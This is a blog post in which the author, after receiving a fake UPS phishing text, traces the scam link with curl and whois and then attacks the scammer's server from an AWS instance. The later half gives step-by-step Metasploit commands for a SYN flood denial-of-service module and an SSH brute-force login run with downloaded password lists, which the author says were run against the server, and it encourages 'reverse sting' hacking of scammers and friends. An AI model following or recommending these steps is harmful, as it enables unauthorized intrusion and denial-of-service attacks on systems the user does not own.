Blog

Defensive Hacking Aggravate a Scammer

Nov 02 | 10 minutes read
Share this:

I’ll start by saying that this is probably not very effective at actually stopping a scammer but it will arm you with more information that you could choose to act by reporting them to various groups. It also might make you feel a little better, like yelling at someone who has stollen something from you and trying to chase them for a bit down the street.

This could also be a hacking primer. I’ll assume you’re here for good though and only trying to retaliate against someone that has done you harm.

It started with a whisper … just kidding. It started with a SMS message:

Initial text

From: re7@ups-dlvr.com
UPS#7123293: We were unable 
to complete your delivery to 
reschedule, please 
navigate below: https://bit.ly/
3Tm3lbK

As it happens, I was expecting an UPS delivery this week. It was a long day at work and I was tired. I even ran outside to see if I could see the truck or any evidence that they had tried to deliver something. I didn’t see anything. I then clicked on the link and was taken to a site that had a URL similar to http://ups-wwwaps.com (I didn’t save it). It had a page that looked like a UPS site, and a login field. I auto-populated with something that I thought was my UPS login, and nothing came up. I figured I’d deal with it later and then took a nap.

I woke up from my nap realizing how dumb I had been. I had 1) confirmed a phone number with an email address and 2) may have given them valid login credentials. As it turned out, I didn’t have valid credentials that were using those fields, so I got off lucky there. But now, I was curious about them. Where were they? I started to do some research, thought about reporting them to The Gov’ment, but decided against it. It looked like a lot of red tape and they wanted ALL of my personal info. Let’s see what I can find out.

I decided to do some research, and try to figure out how much I could obtain about my scammer. Here is my process, maybe you can do something similar (or even better), once I show you the tools available to you.

Start with the bit link. Bitlinks are redirects. Bitly keeps a mapping of the link that they give you with the link that someone wants it to redirect to. Looking up the bit link with curl doesn’t expose you to the scammer. Going to it in a browser, will.

In your closest handy terminal (Macos / Unix variant) run the following command with the URL that was sent to you.

curl -I https://bit.ly/3Tm3lbK

This comes back with the following:

HTTP/2 301
server: nginx
date: Thu, 03 Nov 2022 01:23:25 GMT
content-type: text/html; charset=utf-8
content-length: 110
cache-control: private, max-age=90
location: http://159.223.184.236/
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

This shows that there is a 301 (which is a redirect). All 301 responses are going to have a location, which tells you where to go next. In this case, we have a location that is curiously at an IP address. This is suspicious right away, as any stable website would want to use a domain name instead of an IP. They’re going incognito.

Once you have an IP, you can go do two searches. Whois and ARIN.

In your terminal type in: whois 159.223.184.236 or nslookup 159.223.184.236

This will tell you a little info about who has registered the IP address. If there is a domain attached to it, it will tell you who owns that domain. It may not be the individual, it may also show as part of a range of IPs for an ISP. It will NOT be the site that you thought you were going to. Mine said nothing about “UPS” owning it.

If you don’t get enough useful info there, you can also go to ARIN and enter the IP in their main search bar on the home page. This will tell you who owns the bucket of URLs, very likely an ISP.

If you’d like to stop here and report them to their ISP, that’s a perfectly good place to stop. Or not!

Now, I’d like to start probing the IP address, but as soon as I contact that server from my machine, I’m giving away my IP address. Just more info to them. So, let’s go do this on a safe machine and open up an AWS EC2 instance instead. This is a little cumbersome if you haven’t done it before. BUT, you only have to do this first part once.

(You can skip if you already have a .pem and a security group set up) If you haven’t already, you’ll first need to set up an AWS account. You’ll have to give them payment information but it won’t cost you anything to have an account. For the small amount of time that you’ll be running a server, it won’t cost you a dime either. Just make sure you turn off the server when you’re done.

AWS has a short document on setting up the basics. You’ll need a keypair.pem file which will provide your authentication when you SSH into your EC2 (download it and save it somewhere that you can find again), and you’ll need to set up a security group in AWS, which you will be able to reuse. The main thing to do in Security Groups is add a rule for Type: SSH. You don’t even need to allow HTTP if you’re not hosting a web server.

An EC2 is just a virtual machine with an operating system already installed. You pick the size and the OS and AWS will “spin it up” for you. More detailed instructions from AWS are here on setting up an EC2. Make sure you choose the Free Tier and Ubuntu as your OS.

After you answer all the questions, you’ll have an EC2 instance starting up.

From the menu on the left, select “Instances”. This window will come up. Click on the name of the instance you just set up.

Wait a minute or so and then the Public IP will populate. Click the cute Copy icon next to it to save to your clip board. You’ll use it to SSH.

Private IP

Again, Amazon is going to always have the best documentation on using their services. Their guide to accessing ECU instances of Linux are great. The basic is, open up a terminal window locally and enter the following:

ssh -i /path/key-pair-name.pem instance-user-name@instance-public-dns-name

  • /path/key-pair-name.pem with the path to the .pem file you saved,
  • instance-user-name with ubuntu
  • and instance-public-dns-name with the public IP address you just copied to your clipboard.

You’ll get a message in your terminal about “The authenticity of host” being bad and do you want to continue. Say “Yes” . You will only get this message the first time you connect to a new address

You should then see a welcome message.

“Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-1019-aws x86_64)”

Let’s curl that IP address now:

ubuntu@ip-172-31-22-15:~$ curl -I http://159.223.184.236

HTTP/1.1 302 Found
Date: Thu, 03 Nov 2022 02:16:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=6ivaooa02eq0p9cv8s1u5ep0c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: https://www.webfx.com/web-development/glossary/http-status-codes/
Content-Type: text/html; charset=UTF-8

More useful info! My results are showing the results of the site after the scam site was already taken down. Instead of a 302, it would’ve shown a 200 (meaning, you request was successful). But it also shows that they’re running Apache, and Ubuntu. Like me! It’s also showing that there is a PHPSESSID, which tells me that they’re running PHP.

Now we’re getting somewhere. This info could be useful in choosing other types of attacks to run against it.

From here, I really leveraged this tutorial on how to gain ssh access to a server by brute forcing credential. I’ll link to it again at the end. Before you go there, I’d advise some setup:

Type the following into your terminal

  • sudo apt-get update
    • Gets list of all new packages
  • sudo apt-get install nmap
    • and say “Yes” to all the prompts
  • sudo apt-get install postgresql
    • I can’t remember the prompts. Sorry
  • sudo service postgresql start
    • Start postgresql

The official directions are on the metasploit site. I had trouble executing the command so I broke it up and added sudo.

sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
  • sudo msfconsole
    • Say “Yes” for “Would you like to use and setup a new database
    • You need to run as root to get access to the network ports

This isn’t a really large scale attack, but it’s something. From within msfconsole:

  • use auxiliary/dos/tcp/synflood
  • `set RHOSTS
  • set RPORT 80
  • exploit

This guy has a pretty amazing repo of passwords and usernames. Pick some and download them with wget to your ubuntu instance. Go to the file, so you can view the contents and copy the permalink, like so: Copy Permalink

Go to your ubuntu terminal and enter wget and paste the url you copied, like so (no returns until the end): wget https://github.com/danielmiessler/SecLists/blob/74a331a039532b8a6fd92af376cb0215a5dc0378/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

This will download a file to the directory that you’re in. Type ls and you’ll see top-20-common-SSH-passwords.txt

Do the same with usernames, like so:

wget https://github.com/danielmiessler/SecLists/blob/74a331a039532b8a6fd92af376cb0215a5dc0378/Usernames/top-usernames-shortlist.txt

Type ls and you’ll now see the password and the top-usernames-shortlist.txt

From there, I followed the directions on the tutorial I linked above to start the postgresql service and run msfconsole.

  1. Following the tutorial I set rhosts to be the IP I got above.
  2. I set the user_file to be the name of the user file I downloaded.
  3. I set the pass_file to be the name of the password file I downloaded.
  4. And I used auxiliary/scanner/ssh/ssh_login as was also mentioned in the tutorial.
  5. Then I entered run

With set verbose true, I was able to see every attempt at every login and password. run scanner

I stopped here, but if I spent more time learning msfconsole, I could also try more PHP, apache, or ubuntu targeted exploits. msfconsole has many more options, but you need to dedicate a little time in each to learn what they are.

I did not successfully break into the server. I did successfully run through the multiple iterations of usernames & passwords. I also had to restart it a couple of times due to being disconnected. Eventually the scammer server started redirecting to another page. I’m not sure if that had anything to do with me (doubt it), if the scammer closed their service down for a time, or if they were shut down. I’ll keep checking the IP over the next week and see if anything changes.

More importantly though, I’m set up for using msfconsole. There are multiple types of exploits, and “payloads” that can be specified (that github link also has payload examples, or you can specify one that comes with msfconsole). This is a powerful tool! You could run it against your own servers to see if they’re vulnerable, pick a type of exploit and learn more about how it works and why, try to hack your friends as a service, or just try to run a little reverse sting operation on the next scammer that runs across your yard shouting “GET OFF MY LAWN!”

Hope you found this helpful. Feel free to comment.